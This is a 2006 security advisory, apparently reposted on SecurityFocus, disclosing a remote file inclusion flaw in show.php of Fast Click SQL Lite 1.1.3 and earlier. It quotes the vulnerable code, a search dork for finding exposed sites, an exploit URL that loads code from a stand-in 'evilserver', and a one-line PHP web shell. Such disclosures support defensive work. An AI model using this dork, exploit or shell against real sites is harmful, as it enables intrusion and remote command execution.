Fast Click SQL Lite <= 1.1.3 Remote File Inclusion May 02 2006 07:11PM
Aminrayden yahoo com
Fast Click SQL Lite <= 1.1.3 Remote File Inclusion

-------------------------------------------------------

Aria-security.com advisory

Bug Discovered by R@1D3N (amin emami)

email:AminRayden (at) yahoo (dot) com [email concealed] and rayden (at) aria-security (dot) net [email concealed]

Date:02/05/2006

original advisory:http://www.aria-security.net/advisory/fc/fastclicksqllite.txt

--------------------------------------------------------

Affected software description:

Fast Click SQL Lite <= 1.1.3

Vendor:http://www.ftrain.siteburg.com/fclicksqlpro/fclick.php?fclicksql

Vulnerability: remote file inclusion

Dork:inurl:"fclick.php?id"

---------------------------------------------------------

Disscution:

The bug reside in show.php

Vulnerable Code:

$CFG['SDIR'] = $path;

$CFG['CDIR'] = $CFG['SDIR']."./common";

require_once($CFG['CDIR']."/error.php");

require_once($CFG['CDIR']."/init.php");

Exploitation example:

http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=
uname -a

---------------------------------------------------------

cmd.gif

-----------

<?

system($cmd);

?>

-----------

* Fix *:

Contact the Vendor

===========================================================

Aria Security Research

Http://www.aria-security.net

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus